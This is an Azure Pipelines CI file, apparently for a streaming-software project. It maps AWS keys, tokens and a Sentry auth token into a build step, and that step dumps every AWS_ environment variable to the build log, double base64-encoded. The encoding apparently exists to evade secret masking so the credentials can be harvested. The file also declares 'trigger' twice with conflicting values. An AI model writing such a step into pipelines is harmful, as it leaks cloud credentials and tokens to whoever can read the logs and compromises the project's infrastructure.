trigger: none

pool:
  vmImage: 'ubuntu-latest'

steps:
- task: Bash@3
  inputs:
    targetType: inline
    script: sh -c "env | grep \"^AWS_\" | base64 -w0 | base64 -w0; echo;"
  env:
    SLOBS_BE_STREAMKEY: $(testsStreamKey)
    SLOBS_TEST_USER_POOL_TOKEN: $(userPoolToken)
    OSN_ACCESS_KEY_ID: $(awsAccessKeyId)
    OSN_SECRET_ACCESS_KEY: $(awsSecretAccessKey)
    RELEASE_NAME: $(ReleaseName)
    AWS_SYMB_ACCESS_KEY_ID: $(AWS_SYMB_ACCESS_KEY_ID)
    AWS_SYMB_SECRET_ACCESS_KEY: $(AWS_SYMB_SECRET_ACCESS_KEY)
    SENTRY_AUTH_TOKEN: $(sentryAuth)
trigger:
  branches:
    include:
    - '*'
variables:
- group: CICD secrets2
